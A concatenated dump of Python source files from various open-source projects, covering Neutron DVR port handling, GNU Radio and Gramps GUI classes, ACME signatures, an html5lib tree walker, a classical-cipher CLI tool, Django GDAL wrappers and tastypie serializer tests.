self.int_br.delete_flows(table=table_id,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac())
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_centralized_snat_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for csnat port %s", port)
sub_uuid = list(ovsport.get_subnets())[0]
# ensure we process for all the subnets laid on this port
if sub_uuid not in self.local_dvr_map:
return
ldm = self.local_dvr_map[sub_uuid]
ldm.set_csnat_ofport(constants.OFPORT_INVALID)
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# then remove csnat port rule
self.int_br.delete_flows(table=table_id,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac())
if not ldm.is_dvr_owned():
# if not owned by DVR (only used for csnat), remove this
# subnet state altogether
self.local_dvr_map.pop(sub_uuid, None)
# release port state
self.local_ports.pop(port.vif_id, None)
def unbind_port_from_dvr(self, vif_port, local_vlan_map):
if not self.in_distributed_mode():
return
# Handle port removed use-case
if vif_port and vif_port.vif_id not in self.local_ports:
LOG.debug("DVR: Non distributed port, ignoring %s", vif_port)
return
ovsport = self.local_ports[vif_port.vif_id]
device_owner = ovsport.get_device_owner()
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._unbind_distributed_router_interface_port(vif_port,
local_vlan_map)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._unbind_port_on_dvr_subnet(vif_port,
local_vlan_map)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._unbind_centralized_snat_port_on_dvr_subnet(vif_port,
local_vlan_map)
|
n-west/gnuradio
|
refs/heads/maint
|
grc/gui/Config.py
|
18
|
"""
Copyright 2016 Free Software Foundation, Inc.
This file is part of GNU Radio
GNU Radio Companion is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
import sys
import os
from ..core.Config import Config as _Config
from . import Constants
class Config(_Config):
name = 'GNU Radio Companion'
gui_prefs_file = os.environ.get(
'GRC_PREFS_PATH', os.path.expanduser('~/.gnuradio/grc.conf'))
def __init__(self, install_prefix, *args, **kwargs):
_Config.__init__(self, *args, **kwargs)
self.install_prefix = install_prefix
Constants.update_font_size(self.font_size)
@property
def editor(self):
return self.prefs.get_string('grc', 'editor', '')
@editor.setter
def editor(self, value):
self.prefs.get_string('grc', 'editor', value)
self.prefs.save()
@property
def xterm_executable(self):
return self.prefs.get_string('grc', 'xterm_executable', 'xterm')
@property
def default_canvas_size(self):
try: # ugly, but matches current code style
raw = self.prefs.get_string('grc', 'canvas_default_size', '1280, 1024')
value = tuple(int(x.strip('() ')) for x in raw.split(','))
if len(value) != 2 or not all(300 < x < 4096 for x in value):
raise Exception()
return value
except:
print >> sys.stderr, "Error: invalid 'canvas_default_size' setting."
return Constants.DEFAULT_CANVAS_SIZE_DEFAULT
@property
def font_size(self):
try: # ugly, but matches current code style
font_size = self.prefs.get_long('grc', 'canvas_font_size',
Constants.DEFAULT_FONT_SIZE)
if font_size <= 0:
raise Exception()
except:
font_size = Constants.DEFAULT_FONT_SIZE
print >> sys.stderr, "Error: invalid 'canvas_font_size' setting."
return font_size
|
tdfischer/lets-encrypt-preview
|
refs/heads/master
|
acme/acme/other.py
|
14
|
"""Other ACME objects."""
import functools
import logging
import os
from acme import jose
logger = logging.getLogger(__name__)
class Signature(jose.JSONObjectWithFields):
"""ACME signature.
:ivar .JWASignature alg: Signature algorithm.
:ivar bytes sig: Signature.
:ivar bytes nonce: Nonce.
:ivar .JWK jwk: JWK.
"""
NONCE_SIZE = 16
"""Minimum size of nonce in bytes."""
alg = jose.Field('alg', decoder=jose.JWASignature.from_json)
sig = jose.Field('sig', encoder=jose.encode_b64jose,
decoder=jose.decode_b64jose)
nonce = jose.Field(
'nonce', encoder=jose.encode_b64jose, decoder=functools.partial(
jose.decode_b64jose, size=NONCE_SIZE, minimum=True))
jwk = jose.Field('jwk', decoder=jose.JWK.from_json)
@classmethod
def from_msg(cls, msg, key, nonce=None, nonce_size=None, alg=jose.RS256):
"""Create signature with nonce prepended to the message.
:param bytes msg: Message to be signed.
:param key: Key used for signing.
:type key: `cryptography.hazmat.primitives.assymetric.rsa.RSAPrivateKey`
(optionally wrapped in `.ComparableRSAKey`).
:param bytes nonce: Nonce to be used. If None, nonce of
``nonce_size`` will be randomly generated.
:param int nonce_size: Size of the automatically generated nonce.
Defaults to :const:`NONCE_SIZE`.
:param .JWASignature alg:
"""
nonce_size = cls.NONCE_SIZE if nonce_size is None else nonce_size
nonce = os.urandom(nonce_size) if nonce is None else nonce
msg_with_nonce = nonce + msg
sig = alg.sign(key, nonce + msg)
logger.debug('%r signed as %r', msg_with_nonce, sig)
return cls(alg=alg, sig=sig, nonce=nonce,
jwk=alg.kty(key=key.public_key()))
def verify(self, msg):
"""Verify the signature.
:param bytes msg: Message that was used in signing.
"""
# self.alg is not Field, but JWA | pylint: disable=no-member
return self.alg.verify(self.jwk.key, self.nonce + msg, self.sig)
|
fillycheezstake/MissionPlanner
|
refs/heads/master
|
Lib/site-packages/numpy/distutils/tests/f2py_ext/setup.py
|
51
|
#!"C:\Users\hog\Documents\Visual Studio 2010\Projects\ArdupilotMega\ArdupilotMega\bin\Debug\ipy.exe"
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('f2py_ext',parent_package,top_path)
config.add_extension('fib2', ['src/fib2.pyf','src/fib1.f'])
config.add_data_dir('tests')
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(configuration=configuration)
|
newmediamedicine/indivo_server_1_0
|
refs/heads/master
|
indivo/tests/data/reports/__init__.py
|
4
|
from allergy import TEST_ALLERGIES, TEST_ALLERGIES_INVALID
from equipment import TEST_EQUIPMENT
from immunization import TEST_IMMUNIZATIONS
from lab import TEST_LABS
from measurement import TEST_MEASUREMENTS
from medication import TEST_MEDICATIONS
from problem import TEST_PROBLEMS
from procedure import TEST_PROCEDURES
from simple_clinical_note import TEST_CLINICAL_NOTES
from vital import TEST_VITALS
TEST_REPORTS = TEST_LABS + TEST_ALLERGIES + TEST_EQUIPMENT + TEST_IMMUNIZATIONS + TEST_MEASUREMENTS + TEST_MEDICATIONS + TEST_PROBLEMS + TEST_PROCEDURES + TEST_CLINICAL_NOTES + TEST_VITALS
TEST_REPORTS_INVALID = TEST_ALLERGIES_INVALID
|
beernarrd/gramps
|
refs/heads/sl-master
|
gramps/gui/basesidebar.py
|
10
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010 Nick Hall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# BaseSidebar class
#
#-------------------------------------------------------------------------
class BaseSidebar:
"""
The base class for all sidebar plugins.
"""
def __init__(self, dbstate, uistate):
raise NotImplementedError
def get_top(self):
"""
Return the top container widget for the GUI.
"""
raise NotImplementedError
def view_changed(self, cat_num, view_num):
"""
Called when the active view is changed.
"""
raise NotImplementedError
def active(self, cat_num, view_num):
"""
Called when the sidebar is made visible.
"""
pass
def inactive(self):
"""
Called when the sidebar is hidden.
"""
pass
|
zubron/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/html5lib/html5lib/treewalkers/genshistream.py
|
1730
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
|
underloki/Cyprium
|
refs/heads/master
|
app/cli/root/crypto/text/triliteral.py
|
1
|
#! /usr/bin/python3
########################################################################
# #
# Cyprium is a multifunction cryptographic, steganographic and #
# cryptanalysis tool developped by members of The Hackademy. #
# French White Hat Hackers Community! #
# cyprium.hackademics.fr # #
# Authors: SAKAROV, mont29, afranck64 #
# Contact: [email protected] #
# Forum: hackademics.fr #
# Twitter: @hackademics_ #
# #
# Cyprium is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published #
# by the Free Software Foundation, either version 3 of the License, #
# or any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but without any warranty; without even the implied warranty of #
# merchantability or fitness for a particular purpose. See the #
# GNU General Public License for more details. #
# #
# The terms of the GNU General Public License is detailed in the #
# COPYING attached file. If not, see : http://www.gnu.org/licenses #
# #
########################################################################
import sys
import os
# In case we directly run that file, we need to add the whole cyprium to path,
# to get access to CLI stuff!
if __name__ == "__main__":
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),
"..", "..", "..", "..",
"..")))
import app.cli
import kernel.crypto.text.triliteral as triliteral
import kernel.utils as utils
class Triliteral(app.cli.Tool):
"""CLI wrapper for triliteral crypto text tool."""
def main(self, ui):
ui.message("********** Welcome to Cyprium.Triliteral! **********")
quit = False
while not quit:
options = [(self.about, "*about", "Show some help!"),
(self.demo, "*demo", "Show some examples"),
(self.cypher, "*cypher",
"Cypher some text in triliteral"),
(self.decypher, "d*ecypher",
"Decypher triliteral into text"),
("", "-----", ""),
("tree", "*tree", "Show the whole tree"),
("quit", "*quit", "Quit Cyprium.Triliteral")]
msg = "Cyprium.Biliteral"
answ = ui.get_choice(msg, options)
if answ == 'tree':
self._tree.print_tree(ui, self._tree.FULL)
elif answ == 'quit':
self._tree.current = self._tree.current.parent
quit = True
else:
answ(ui)
ui.message("Back to Cyprium menus! Bye.")
def about(self, ui):
ui.message(triliteral.__about__)
ui.get_choice("", [("", "Go back to $menu", "")], oneline=True)
def demo(self, ui):
ui.message("===== Demo Mode =====")
ui.message("Running a small demo/testing!")
ui.message("")
ui.message("--- Cyphering ---")
text = "snoworrain"
ui.message("Data to cypher: {}".format(text))
out = triliteral.cypher(text)
ui.message("Triliteral cyphered data: {}".format(out))
ui.message("")
ui.message("--- Decyphering ---")
htext = "CBAACCCAAACCCABCABACBABBACBAAAAACBABAAAABAABBBBACCAABABBC" \
"CABABCBCC"
ui.message("Triliteral text used as input: {}".format(htext))
out = triliteral.decypher(htext)
ui.message("The decyphered data is: {}".format(out))
ui.message("")
ui.message("--- Note ---")
ui.message("+ You can select another base than the default one "
"(1, 'a' -> AAA). E.g. with a base 13:")
text = "trytocypherthis"
ui.message("Data to cypher: {}".format(text))
out = triliteral.cypher(text, 13)
ui.message("Triliteral base 13 cyphered data: {}".format(out))
out = triliteral.decypher(out, 13)
ui.message("The base 13 decyphered data is: {}".format(out))
ui.message("")
ui.message("--- Won’t work ---")
ui.message("+ The input text to cypher must be ASCII lowercase "
"chars only:")
ui.message("Data to cypher: {}\n".format("Hello World !"))
try:
out = triliteral.cypher("Hello World !")
ui.message("Triliteral cyphered data: {}"
"".format(out))
except Exception as e:
ui.message(str(e), level=ui.ERROR)
ui.message("")
ui.message("+ The input text to decypher must be valid Triliteral:")
htext = "AABCBBBAABABCCCCBBAACABACABCBAABACBAAAACCABABCCBACB"
ui.message("Triliteral text used as input: {}".format(htext))
try:
out = triliteral.decypher(htext)
ui.message("Triliteral decyphered data: {}"
"".format(out))
except Exception as e:
ui.message(str(e), level=ui.ERROR)
ui.message("")
ui.get_choice("", [("", "Go back to $menu", "")], oneline=True)
def cypher(self, ui):
"""Interactive version of cypher()."""
txt = ""
ui.message("===== Cypher Mode =====")
while 1:
done = False
while 1:
base = 1
txt = ui.text_input("Text to cypher to Triliteral",
sub_type=ui.LOWER)
if txt is None:
break # Go back to main Cypher menu.
t = ui.get_data("Cypher base (nothing to use default "
"{} one): ".format(base),
sub_type=ui.INT, allow_void=True)
if t is not None:
base = t
try:
# Will also raise an exception if data is None.
txt = triliteral.cypher(txt, base)
done = True # Out of those loops, output result.
break
except Exception as e:
if utils.DEBUG:
import traceback
traceback.print_tb(sys.exc_info()[2])
ui.message(str(e), level=ui.ERROR)
options = [("retry", "*try again", ""),
("menu", "or go back to *menu", "")]
answ = ui.get_choice("Could not convert that data into "
"Biliteral, please", options,
oneline=True)
if answ in {None, "menu"}:
return # Go back to main Sema menu.
# Else, retry with another data to hide.
if done:
ui.text_output("Text successfully converted", txt,
"Triliteral base {} version of text"
"".format(base))
options = [("redo", "*cypher another text", ""),
("quit", "or go back to *menu", "")]
answ = ui.get_choice("Do you want to", options, oneline=True)
if answ in {None, "quit"}:
return
def decypher(self, ui):
"""Interactive version of decypher()."""
txt = ""
ui.message("===== Decypher Mode =====")
while 1:
base = 1
txt = ui.text_input("Please choose some Triliteral text",
sub_type=ui.UPPER)
t = ui.get_data("Decypher base (nothing to use default "
"{} one): ".format(base),
sub_type=ui.INT, allow_void=True)
if t is not None:
base = t
try:
ui.text_output("Text successfully decyphered",
triliteral.decypher(txt, base),
"The base {} decyphered text is"
"".format(base))
except Exception as e:
if utils.DEBUG:
import traceback
traceback.print_tb(sys.exc_info()[2])
ui.message(str(e), level=ui.ERROR)
options = [("redo", "*decypher another data", ""),
("quit", "or go back to *menu", "")]
answ = ui.get_choice("Do you want to", options, oneline=True)
if answ == "quit":
return
NAME = "triliteral"
TIP = "Tool to convert text to/from triliteral code."
TYPE = app.cli.Node.TOOL
CLASS = Triliteral
# Allow tool to be used directly, without using Cyprium menu.
if __name__ == "__main__":
import app.cli.ui
ui = app.cli.ui.UI()
tree = app.cli.NoTree("Triliteral")
Triliteral(tree).main(ui)
|
ZhaoCJ/django
|
refs/heads/master
|
django/contrib/gis/gdal/datasource.py
|
219
|
"""
DataSource is a wrapper for the OGR Data Source object, which provides
an interface for reading vector geometry data from many different file
formats (including ESRI shapefiles).
When instantiating a DataSource object, use the filename of a
GDAL-supported data source. For example, a SHP file or a
TIGER/Line file from the government.
The ds_driver keyword is used internally when a ctypes pointer
is passed in directly.
Example:
ds = DataSource('/home/foo/bar.shp')
for layer in ds:
for feature in layer:
# Getting the geometry for the feature.
g = feature.geom
# Getting the 'description' field for the feature.
desc = feature['description']
# We can also increment through all of the fields
# attached to this feature.
for field in feature:
# Get the name of the field (e.g. 'description')
nm = field.name
# Get the type (integer) of the field, e.g. 0 => OFTInteger
t = field.type
# Returns the value the field; OFTIntegers return ints,
# OFTReal returns floats, all else returns string.
val = field.value
"""
# ctypes prerequisites.
from ctypes import byref
# The GDAL C library, OGR exceptions, and the Layer object.
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.error import OGRException, OGRIndexError
from django.contrib.gis.gdal.layer import Layer
# Getting the ctypes prototypes for the DataSource.
from django.contrib.gis.gdal.prototypes import ds as capi
from django.utils.encoding import force_bytes, force_text
from django.utils import six
from django.utils.six.moves import xrange
# For more information, see the OGR C API source code:
# http://www.gdal.org/ogr/ogr__api_8h.html
#
# The OGR_DS_* routines are relevant here.
class DataSource(GDALBase):
"Wraps an OGR Data Source object."
#### Python 'magic' routines ####
def __init__(self, ds_input, ds_driver=False, write=False, encoding='utf-8'):
# The write flag.
if write:
self._write = 1
else:
self._write = 0
# See also http://trac.osgeo.org/gdal/wiki/rfc23_ogr_unicode
self.encoding = encoding
# Registering all the drivers, this needs to be done
# _before_ we try to open up a data source.
if not capi.get_driver_count():
capi.register_all()
if isinstance(ds_input, six.string_types):
# The data source driver is a void pointer.
ds_driver = Driver.ptr_type()
try:
# OGROpen will auto-detect the data source type.
ds = capi.open_ds(force_bytes(ds_input), self._write, byref(ds_driver))
except OGRException:
# Making the error message more clear rather than something
# like "Invalid pointer returned from OGROpen".
raise OGRException('Could not open the datasource at "%s"' % ds_input)
elif isinstance(ds_input, self.ptr_type) and isinstance(ds_driver, Driver.ptr_type):
ds = ds_input
else:
raise OGRException('Invalid data source input type: %s' % type(ds_input))
if bool(ds):
self.ptr = ds
self.driver = Driver(ds_driver)
else:
# Raise an exception if the returned pointer is NULL
raise OGRException('Invalid data source file "%s"' % ds_input)
def __del__(self):
"Destroys this DataStructure object."
if self._ptr: capi.destroy_ds(self._ptr)
def __iter__(self):
"Allows for iteration over the layers in a data source."
for i in xrange(self.layer_count):
yield self[i]
def __getitem__(self, index):
"Allows use of the index [] operator to get a layer at the index."
if isinstance(index, six.string_types):
l = capi.get_layer_by_name(self.ptr, force_bytes(index))
if not l: raise OGRIndexError('invalid OGR Layer name given: "%s"' % index)
elif isinstance(index, int):
if index < 0 or index >= self.layer_count:
raise OGRIndexError('index out of range')
l = capi.get_layer(self._ptr, index)
else:
raise TypeError('Invalid index type: %s' % type(index))
return Layer(l, self)
def __len__(self):
"Returns the number of layers within the data source."
return self.layer_count
def __str__(self):
"Returns OGR GetName and Driver for the Data Source."
return '%s (%s)' % (self.name, str(self.driver))
@property
def layer_count(self):
"Returns the number of layers in the data source."
return capi.get_layer_count(self._ptr)
@property
def name(self):
"Returns the name of the data source."
name = capi.get_ds_name(self._ptr)
return force_text(name, self.encoding, strings_only=True)
|
loftywaif002/django-tastypie
|
refs/heads/master
|
tests/core/tests/serializers.py
|
20
|
# -*- coding: utf-8 -*-
import datetime
import yaml
from decimal import Decimal
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from tastypie.bundle import Bundle
from tastypie import fields
from tastypie.exceptions import BadRequest
from tastypie.serializers import Serializer
from tastypie.resources import ModelResource
from core.models import Note
try:
import biplist
except ImportError:
biplist = None
class UnsafeObject(object):
pass
class NoteResource(ModelResource):
class Meta:
resource_name = 'notes'
queryset = Note.objects.filter(is_active=True)
class AnotherNoteResource(ModelResource):
aliases = fields.ListField(attribute='aliases', null=True)
meta = fields.DictField(attribute='metadata', null=True)
owed = fields.DecimalField(attribute='money_owed', null=True)
class Meta:
resource_name = 'anothernotes'
queryset = Note.objects.filter(is_active=True)
def dehydrate(self, bundle):
bundle.data['aliases'] = ['Mr. Smith', 'John Doe']
bundle.data['meta'] = {'threat': 'high'}
bundle.data['owed'] = Decimal('102.57')
return bundle
class SerializerTestCase(TestCase):
def test_init(self):
serializer_1 = Serializer()
self.assertEqual(serializer_1.formats, ['json', 'xml', 'yaml', 'html', 'plist'])
self.assertEqual(serializer_1.content_types, {'xml': 'application/xml', 'yaml': 'text/yaml', 'json': 'application/json', 'jsonp': 'text/javascript', 'html': 'text/html', 'plist': 'application/x-plist'})
self.assertEqual(serializer_1.supported_formats, ['application/json', 'application/xml', 'text/yaml', 'text/html', 'application/x-plist'])
serializer_2 = Serializer(formats=['json', 'xml'])
self.assertEqual(serializer_2.formats, ['json', 'xml'])
self.assertEqual(serializer_2.content_types, {'xml': 'application/xml', 'yaml': 'text/yaml', 'json': 'application/json', 'jsonp': 'text/javascript', 'html': 'text/html', 'plist': 'application/x-plist'})
self.assertEqual(serializer_2.supported_formats, ['application/json', 'application/xml'])
serializer_3 = Serializer(formats=['json', 'xml'], content_types={'json': 'text/json', 'xml': 'application/xml'})
self.assertEqual(serializer_3.formats, ['json', 'xml'])
self.assertEqual(serializer_3.content_types, {'xml': 'application/xml', 'json': 'text/json'})
self.assertEqual(serializer_3.supported_formats, ['text/json', 'application/xml'])
serializer_4 = Serializer(formats=['plist', 'json'], content_types={'plist': 'application/x-plist', 'json': 'application/json'})
self.assertEqual(serializer_4.formats, ['plist', 'json'])
self.assertEqual(serializer_4.content_types, {'plist': 'application/x-plist', 'json': 'application/json'})
self.assertEqual(serializer_4.supported_formats, ['application/x-plist', 'application/json'])
self.assertRaises(ImproperlyConfigured, Serializer, formats=['json', 'xml'], content_types={'json': 'text/json'})
def test_default_formats_setting(self):
# When we drop support for Django 1.3 this boilerplate can be replaced with
# a simple django.test.utils.override_settings decorator:
old_formats = getattr(settings, 'TASTYPIE_DEFAULT_FORMATS', None)
try:
# Confirm that the setting will override the default values:
settings.TASTYPIE_DEFAULT_FORMATS = ('json', 'xml')
s = Serializer()
self.assertEqual(list(s.formats), ['json', 'xml'])
self.assertEqual(list(s.supported_formats), ['application/json', 'application/xml'])
self.assertEqual(s.content_types, {'xml': 'application/xml', 'yaml': 'text/yaml', 'json': 'application/json', 'jsonp': 'text/javascript', 'html': 'text/html', 'plist': 'application/x-plist'})
# Confirm that subclasses which set their own formats list won't be overriden:
class JSONSerializer(Serializer):
formats = ['json']
js = JSONSerializer()
self.assertEqual(list(js.formats), ['json'])
self.assertEqual(list(js.supported_formats), ['application/json'])
finally:
if old_formats is None:
del settings.TASTYPIE_DEFAULT_FORMATS
else:
settings.TASTYPIE_DEFAULT_FORMATS = old_formats
def get_sample1(self):
return {
'name': 'Daniel',
'age': 27,
'date_joined': datetime.date(2010, 3, 27),
'snowman': u'☃',
}
def get_sample2(self):
return {
'somelist': ['hello', 1, None],
'somehash': {'pi': 3.14, 'foo': 'bar'},
'somestring': 'hello',
'true': True,
'false': False,
}
def test_format_datetime(self):
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
serializer = Serializer(datetime_formatting='iso-8601')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
serializer = Serializer(datetime_formatting='iso-8601-strict')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33, 10)), '2010-12-16T02:31:33')
serializer = Serializer(datetime_formatting='rfc-2822')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), u'Thu, 16 Dec 2010 02:31:33 -0600')
serializer = Serializer(datetime_formatting='random-garbage')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
# Stow.
old_format = getattr(settings, 'TASTYPIE_DATETIME_FORMATTING', 'iso-8601')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601-strict'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33, 10)), '2010-12-16T02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), u'Thu, 16 Dec 2010 02:31:33 -0600')
settings.TASTYPIE_DATETIME_FORMATTING = 'random-garbage'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
# Restore.
settings.TASTYPIE_DATETIME_FORMATTING = old_format
def test_format_date(self):
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
serializer = Serializer(datetime_formatting='iso-8601')
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
serializer = Serializer(datetime_formatting='rfc-2822')
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), u'16 Dec 2010')
serializer = Serializer(datetime_formatting='random-garbage')
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
# Stow.
old_format = getattr(settings, 'TASTYPIE_DATETIME_FORMATTING', 'iso-8601')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601'
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
settings.TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), u'16 Dec 2010')
settings.TASTYPIE_DATETIME_FORMATTING = 'random-garbage'
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
# Restore.
settings.TASTYPIE_DATETIME_FORMATTING = old_format
def test_format_time(self):
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
serializer = Serializer(datetime_formatting='iso-8601')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
serializer = Serializer(datetime_formatting='iso-8601-strict')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33, 10)), '02:31:33')
serializer = Serializer(datetime_formatting='rfc-2822')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), u'02:31:33 -0600')
serializer = Serializer(datetime_formatting='random-garbage')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
# Stow.
old_format = getattr(settings, 'TASTYPIE_DATETIME_FORMATTING', 'iso-8601')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601-strict'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33, 10)), '02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), u'02:31:33 -0600')
settings.TASTYPIE_DATETIME_FORMATTING = 'random-garbage'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
# Restore.
settings.TASTYPIE_DATETIME_FORMATTING = old_format
def test_to_xml(self):
serializer = Serializer()
sample_1 = self.get_sample1()
# This needs a little explanation.
# From http://lxml.de/parsing.html, what comes out of ``tostring``
# (despite encoding as UTF-8) is a bytestring. This is because that's
# what other libraries expect (& will do the decode). We decode here
# so we can make extra special sure it looks right.
binary_xml = serializer.to_xml(sample_1)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, u'<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><age type="integer">27</age><date_joined>2010-03-27</date_joined><name>Daniel</name><snowman>☃</snowman></response>')
def test_to_xml2(self):
serializer = Serializer()
sample_2 = self.get_sample2()
binary_xml = serializer.to_xml(sample_2)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><false type="boolean">False</false><somehash type="hash"><foo>bar</foo><pi type="float">3.14</pi></somehash><somelist type="list"><value>hello</value><value type="integer">1</value><value type="null"/></somelist><somestring>hello</somestring><true type="boolean">True</true></response>')
def test_from_xml(self):
serializer = Serializer()
data = u'<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<request><snowman>☃</snowman><age type="integer">27</age><name>Daniel</name><date_joined>2010-03-27</date_joined><rocksdahouse type="boolean">True</rocksdahouse></request>'
self.assertEqual(serializer.from_xml(data), {'rocksdahouse': True, 'age': 27, 'name': 'Daniel', 'date_joined': '2010-03-27', 'snowman': u'☃'})
def test_from_xml2(self):
serializer = Serializer()
data = '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<request><somelist type="list"><value>hello</value><value type="integer">1</value><value type="null"/></somelist><somehash type="hash"><pi type="float">3.14</pi><foo>bar</foo></somehash><false type="boolean">False</false><true type="boolean">True</true><somestring>hello</somestring></request>'
self.assertEqual(serializer.from_xml(data), self.get_sample2())
def test_malformed_xml(self):
serializer = Serializer()
data = '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<request><somelist type="list"><valueNO CARRIER'
self.assertRaises(BadRequest, serializer.from_xml, data)
def test_to_json(self):
serializer = Serializer()
sample_1 = self.get_sample1()
self.assertEqual(serializer.to_json(sample_1), u'{"age": 27, "date_joined": "2010-03-27", "name": "Daniel", "snowman": "☃"}')
def test_from_json(self):
serializer = Serializer()
sample_1 = serializer.from_json(u'{"age": 27, "date_joined": "2010-03-27", "name": "Daniel", "snowman": "☃"}')
self.assertEqual(len(sample_1), 4)
